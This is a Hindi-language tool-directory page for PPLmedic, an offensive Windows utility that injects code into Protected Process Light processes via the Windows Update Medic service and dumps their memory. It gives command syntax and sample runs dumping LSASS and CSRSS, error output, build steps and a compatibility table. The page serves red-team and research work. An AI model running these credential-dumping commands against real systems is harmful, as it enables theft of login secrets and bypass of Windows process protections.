Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
PPLmedic — किसी भी PPL की मेमोरी को Userland exploit chain के साथ डंप करें | Kitploit
उपकरण/GitHubGitHub/itm4n/pplmedic
विशेषाधिकार वृद्धिशोषणपोस्ट-शोषणरेड टीमिंगपेलोड डेवलपमेंटArchived
GitHubitm4n/pplmedic

PPLmedic

किसी भी PPL की मेमोरी को Userland exploit chain के साथ डंप करें

रिपॉजिटरी देखें
353393 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

PPLmedic

यह टूल Windows साइनर प्रकार वाले PPL में मनमाना कोड इंजेक्ट करने और साइनर प्रकार को WinTcb तक बढ़ाने के लिए एक Userland एक्सप्लॉइट श्रृंखला लागू करता है। ये तकनीकें मूल रूप से जेम्स फोरशॉ (जिन्हें @tiraniddo के नाम से भी जाना जाता है) द्वारा उनके ब्लॉग पोस्ट Windows संरक्षित प्रक्रियाओं में COM का उपयोग करके कोड इंजेक्ट करना - भाग 1 में चर्चा की गई थीं।

इस टूल के बारे में अधिक जानने के लिए, आपको इसका सहयोगी ब्लॉग पोस्ट यहाँ पढ़ना चाहिए:

  • Userland में PPL को बायपास करना (फिर से)

💣 अस्वीकरण

मैं इस टूल को एक उन्नत प्रूफ-ऑफ-कॉन्सेप्ट (advanced Proof-of-Concept) के रूप में वर्गीकृत करूँगा। किसी वास्तविक अभियान (engagement) में इसे उपयोग करने से पहले आपको दो बार सोचना चाहिए। यह उपयोग करना सुरक्षित है जब तक इसे बाधित (interrupt) नहीं किया जाता, और उदाहरण के लिए किसी EDR की उपस्थिति में इसकी गारंटी नहीं दी जा सकती।

यह Windows Update Medic सेवा से संबंधित महत्वपूर्ण रजिस्ट्री कुंजियों को संशोधित करता है। सबसे बुरी स्थिति में, यदि उन रजिस्ट्री कुंजियों को ठीक से पुनर्स्थापित नहीं किया जाता है, तो यह सेवा ठीक से कार्य नहीं कर पाएगी, लेकिन इससे OS क्रैश नहीं होगा।

📝 उपयोग

आवश्यक शर्तें:

  • विशेषाधिकार: SeDebugPrivilege के साथ Administrator या SYSTEM
  • प्लेटफ़ॉर्म: Windows 10/11 या Windows Server 2019/2022
  • आर्किटेक्चर: केवल x86_64 समर्थित है
root@kitploit:~
REM Use the option -p to elevate from PPL-Windows to PPL-WinTcb
PPLmedic.exe dump "PID" "C:\FULL\PATH\TO\DUMP.dmp" [-p]

किसी PPL-Windows या उससे नीचे की प्रक्रिया का डंप लें (जैसे: LSASS):

root@kitploit:~
C:\WINDOWS\system32>tasklist | findstr lsass
lsass.exe                      756 Services                   0     20,028 K

C:\WINDOWS\system32>C:\Temp\PPLmedic.exe dump 756 c:\Temp\lsass.dmp
[...]
[+] Payload DLL successfully loaded after 272 attempts!
[*] Deleting 272 temporary directories created by the service...
[*] Connected to remote process.
[+] Remote process protection level: 0x00000002 (PsProtectedSignerWindows-Light)
[+] Memory dump of process with PID 756 successful: c:\Temp\lsass.dmp
[...]

किसी PPL-WinTcb प्रक्रिया का डंप लें (जैसे: CSRSS):

root@kitploit:~
C:\WINDOWS\system32>tasklist | findstr csrss
csrss.exe                      520 Services                   0     26,420 K
csrss.exe                      608 Console                    1     57,548 K

C:\WINDOWS\system32>C:\Temp\PPLmedic.exe dump 520 c:\Temp\csrss.dmp -p
[...]
[+] Payload DLL successfully loaded after 181 attempts!
[*] Deleting 181 temporary directories created by the service...
[*] Connected to remote process.
[+] Remote process protection level: 0x00000002 (PsProtectedSignerWindows-Light)
[*] Attempting to get a higher process protection level...
[+] Target file 'C:\Users\LAB-AD~1\AppData\Local\Temp\faultrep.dll' should now be cache signed (level=12 - Windows).
[*] Connected to remote process.
[+] Remote process protection level: 0x00000000 (PsProtectedSignerWinTcb-Light)
[+] Memory dump of process with PID 520 successful: c:\Temp\csrss.dmp
[...]

📋 परीक्षण

🚧 ज्ञात समस्याएँ

त्रुटि: "अप्रत्याशित त्रुटि या टाइमआउट"

आपको निम्न त्रुटि मिलती है क्योंकि एक्सप्लॉइट दूरस्थ TaskHandler COM ऑब्जेक्ट बनाने का प्रयास करते समय टाइमआउट हो गया। यह आमतौर पर इस बात का संकेत है कि लक्ष्य सेवा WaaSMedicSvc क्रैश हो गई है। इसकी पुष्टि अगले संदेश से होती है: [!] Service WaaSMedicSvc is no longer running। आपको टूल को फिर से चलाने का प्रयास करना चाहिए।

root@kitploit:~
C:\Windows\System32>C:\Temp\PPLmedic.exe dump 1234 C:\Temp\1234.dmp
[...]
[*] Trying to write a valid object directory handle...
[*] Attempt 100/1000 (10%)
[*] Attempt 200/1000 (20%)
[-] Unexpected error or timeout while trying to create a remote TaskHandler instance.
[!] Service WaaSMedicSvc is no longer running, it probably crashed because of an invalid handle value.
[...]

त्रुटि: "अधिकतम प्रयासों की संख्या तक पहुँच गया"

आपको निम्न त्रुटि मिलती है क्योंकि एक्सप्लॉइट 1000 प्रयासों से कम में एक वैध ऑब्जेक्ट डायरेक्ट्री लिखने में विफल रहा। यह सीमा एक सुरक्षा उपाय (failsafe) के रूप में कार्य करती है ताकि लक्ष्य सेवा बहुत अधिक संसाधनों की खपत न करे। आपको टूल को फिर से चलाने का प्रयास करना चाहिए।

root@kitploit:~
C:\Windows\System32>C:\Temp\PPLmedic.exe dump 1234 C:\Temp\1234.dmp
[...]
[*] Trying to write a valid object directory handle...
[...]
[*] Attempt 1000/1000 (100%)
[-] Reached the maximum number of attempts.
[...]

त्रुटि: "LdrpKnownDllDirectoryHandle मान लिखने में विफल"

आपको निम्न त्रुटि मिलती है क्योंकि LaunchDetectionOnly या LaunchRemediationOnly को कॉल करते समय एक अप्रत्याशित त्रुटि हुई। हालाँकि, यह काफी दुर्लभ होना चाहिए। आपको टूल को फिर से चलाने का प्रयास करना चाहिए।

root@kitploit:~
C:\Windows\System32>C:\Temp\PPLmedic.exe dump 1234 C:\Temp\1234.dmp
[...]
[*] Trying to write a valid object directory handle...
[*] Attempt 100/1000 (10%)
[*] Attempt 200/1000 (20%)
[-] Failed to write LdrpKnownDllDirectoryHandle value (thread exit code: 0x800706ba).
[...]

त्रुटि: "कैश साइन करने में विफल ..."

आपको निम्न त्रुटि मिलती है क्योंकि एक्सप्लॉइट पेलोड DLL को कैश साइन करने में विफल रहा। कैटलॉग फ़ाइल पर सेट किया गया oplock संभवतः कभी ट्रिगर नहीं हुआ क्योंकि यह पहले से ही Kernel द्वारा खोला जा चुका था। आप बाद में टूल को पुनः चलाने का प्रयास कर सकते हैं (Windows 11 के लिए, "परीक्षण" अनुभाग देखें)।

root@kitploit:~
C:\Windows\System32>C:\Temp\PPLmedic.exe dump 1234 C:\Temp\1234.dmp -p
[...]
[*] Trying to write a valid object directory handle...
[+] Payload DLL successfully loaded after 1 attempts!
[*] Connected to remote process.
[+] Remote process protection level: 0x00000002 (PsProtectedSignerWindows-Light)
[*] Attempting to get a higher process protection level...
[-] Failed to cache sign 'C:\Users\LAB-AD~1\AppData\Local\Temp\faultrep.dll' (LE: 997).
[...]

🏗 बिल्ड निर्देश

इस Visual Studio Solution में दो प्रोजेक्ट (executable और एक payload DLL) शामिल हैं, जिन्हें एक विशिष्ट क्रम में संकलित करने की आवश्यकता होती है। सब कुछ पहले से कॉन्फ़िगर किया गया है, इसलिए आपको बस इन सरल निर्देशों का पालन करना है। संकलित payload DLL स्वचालित रूप से अंतिम executable में एम्बेड हो जाती है।

  1. Solution को Visual Studio 2019 के साथ खोलें।
  2. Release / x64 चुनें (x86 समर्थित नहीं है!)।
  3. Build > Build Solution।

🎖 श्रेय

  • @tiraniddo - Windows संरक्षित प्रक्रियाओं में COM का उपयोग करके कोड इंजेक्ट करना - भाग 1
    https://googleprojectzero.blogspot.com/2018/10/injecting-code-into-windows-protected.html
टूल डाउनलोड करें
Windows संस्करणPPL-WindowsPPL-WinTcbअवलोकन
Windows 10 22H2 Build 19045.2673✔✔N/A
Windows 11 22H2 Build 22621.1344⚠❌बार-बार सेवा क्रैश + Fake cached signature exploit काम नहीं करता प्रतीत होता है।
Windows Server 2019 Version 1809 Build 17763.4010✔✔N/A
Windows Server 2022 Version 21H2 Build 20348.1547✔✔N/A